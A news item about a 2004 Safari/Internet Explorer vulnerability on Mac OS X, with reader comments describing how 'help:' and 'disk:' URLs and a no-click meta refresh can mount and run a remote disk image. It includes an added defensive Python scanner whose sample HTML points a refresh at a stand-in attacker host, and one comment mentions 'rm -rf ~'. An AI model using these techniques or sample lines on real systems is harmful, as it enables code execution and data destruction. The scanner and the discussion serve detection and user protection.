Mac OS X Safari, Internet Explorer users urged to change preferences to protect against security iss

“In what is being described as a ‘highly critical’ vulnerability, security firm Secunia on Monday issued an advisory to all Mac OS X users that surf the Web with Microsoft’s Internet Explorer or Apple’s Safari Web browsers,” Jim Dalrymple reports for Digit Magazine. “The result of the vulnerability, which has been confirmed using Safari 1.2.1 (v125.1) and Internet Explorer 5.2, is that it is ‘possible to place arbitrary files in a known location, including script files, on a user’s system if the Safari browser has been configured to (‘Open ‘safe’ files after download’) (default behavior) by asking a user to download a ‘.dmg’ (disk image) file.'”

Secunia recommends opening Safari's preferences and unchecking “Open ‘safe’ files after download.”


  1. Actually, the specifics are that it uses a “help:” URL to run a script to open an arbitrary file. In actual fact, “help:” can run ANY AppleScript if the path is known. If used with a “disk:” URL, a remote disk image can be mounted and then anything on that image can be run.

    You can stop Help Viewer processing the “help:” URL, which will prevent the exploit, by using an application such as MisFox to change the protocol helper to something like Preview, but this will break some features of Help Viewer. However, a lack of help is certainly better than rm -rf ~

  2. So, when is it the user’s responsibility to know what they are downloading? It’s not like a .dmg file can actually download itself, even if Safari opens it after. So far, all these OS X “security issues” are based on the user actively choosing to DL unknown/untrusted files, and giving their admin password to install unknown/untrusted software. Somewhere along the way, the user is responsible for their actions, and everybody should be aware that malicious software is trying to get in, and it is up to you to know better. You wouldn’t drive through Harlem at midnight and pick up a hitchhiker, would you?

    As far as Windows goes, that’s like driving a convertible through Harlem at midnight. Locked doors just don’t help.

  3. Atomic- I know Mac users are generally more informed but for the most part people don’t mess with these things. That’s why Mac is a better choice in the first place- ’cause you don’t have to fiddle with things like these- much. It may be sad, but it’s true. I don’t like to mess with these things even though I do so I’m safer.

  4. The Crunge – You’re wrong this time. It could just look like a link. People follow links all the time without knowing what’s on the end of them. It could say ‘click for more information’.

    And A-Bomb – You sound astonishingly arrogant to me today. I honestly don’t know if I have that checked or not (I’ll be looking when I get home). The point is that you shouldn’t need to care about this stuff. It should be configured correctly out of the box. It’d be better if Apple not only unchecked the box by default, but actually removed it too. If it’s so potentially dangerous, it shouldn’t exist at all.

  5. Better SAFE than sorry…

    I usually hate to write with capitals but too many people are downplaying this one. If the disk image is loaded through the disk:// protocol it will ignore the setting in Safari and the dangerous script still gets to be executed. To make sure you don’t get bitten, change the helper for the help:// protocol!

  6. The Crunge: You don’t even have to click on a link… The link using “disk:” could be located in a meta refresh tag that could appear to just be flashing to the web surfer…

    And then, all one has to do is another one using help: and you’re done…

    No click from the user, even with the “Open safe files” set to off…

    That IS a vulnerability!
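Comments 1, 5 and 6 above describe pages that reach Help Viewer through “help:” links and “disk:” URLs, including a meta refresh that needs no click at all. The following is an added example, not code from the article or from any commenter: a small Python scanner that flags those URL schemes wherever a page can carry them (links, embedded resources, form actions and meta refresh tags), handling upper-case schemes, surrounding whitespace and the `N;url=…` wrapper of a refresh. The scheme list, the attribute names it inspects and the sample HTML are constructed for the demonstration; the `help:` URL in the sample is a placeholder, not real Help Viewer syntax.

```python
"""Added example: flag help:/disk: style URLs in a page, including the
no-click meta-refresh variant described in the thread.
The sample HTML and the scheme list are constructed for this demo."""

from html.parser import HTMLParser
from urllib.parse import urlsplit

# Schemes handed to a local helper application rather than rendered by the
# browser. help: and disk:/disks: are the ones named in the thread; treating
# this as the complete list is an assumption for the example.
RISKY_SCHEMES = {"help", "disk", "disks"}


def scheme_of(url):
    """Return the lower-cased scheme of a URL, ignoring surrounding whitespace
    and the leading 'N;url=' wrapper used by <meta http-equiv="refresh">."""
    url = url.strip()
    head, sep, rest = url.partition(";")
    if sep and head.strip().isdigit():
        # meta refresh content: "0;url=disk://..." or "0; URL='disk://...'"
        rest = rest.strip()
        if rest[:4].lower() == "url=":
            rest = rest[4:].strip().strip("'\"")
        url = rest
    return urlsplit(url).scheme.lower()


class RiskyURLScanner(HTMLParser):
    """Collect (tag, attribute, url) triples whose scheme is in RISKY_SCHEMES."""

    # Attributes that can carry a URL the browser will follow or fetch.
    URL_ATTRS = ("href", "src", "data", "action")

    def __init__(self):
        super().__init__()
        self.findings = []

    # HTMLParser also routes self-closing tags (<meta ... />) here.
    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        candidates = []
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            candidates.append(("content", attrs.get("content", "")))
        for name in self.URL_ATTRS:
            if name in attrs:
                candidates.append((name, attrs[name]))
        for name, value in candidates:
            if scheme_of(value) in RISKY_SCHEMES:
                self.findings.append((tag, name, value.strip()))


def scan_html(html):
    """Return every risky (tag, attribute, url) found in the document."""
    scanner = RiskyURLScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one no-click disk: refresh, two help: links
# (one with an upper-case scheme), a disk: image source, and benign noise.
SAMPLE_HTML = """
<html><head>
<meta http-equiv="refresh" content="0; URL=disk://attacker.invalid/image.dmg">
<meta http-equiv="refresh" content="5; url=/next.html">
</head><body>
<a href="help:placeholder-not-real-syntax">click for more information</a>
<a href="HELP:placeholder-upper-case">upper-case scheme</a>
<a href="http://example.com/">ordinary link</a>
<a href="mailto:someone@example.com">mail</a>
<img src="disk:///foo">
</body></html>
"""

if __name__ == "__main__":
    for tag, attr, url in scan_html(SAMPLE_HTML):
        print(f"<{tag} {attr}=...> {url}")
```

The refresh-tag branch is the important one: a `disk:` URL inside `<meta http-equiv="refresh">` fires without a click, so a scanner that only looks at `href` attributes would miss exactly the case comment 6 warns about.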

  7. Does the download location get passed back to a web server?

    Wouldn’t changing your default download location to a randomly named folder on the desktop be just as effective?

  8. I just unchecked this in the General section of Preferences, and can confirm this is a new computer wherein I had not checked this in the first place, so I can definitely confirm this is checked automatically when Safari is loaded by Apple before the computer is sold.
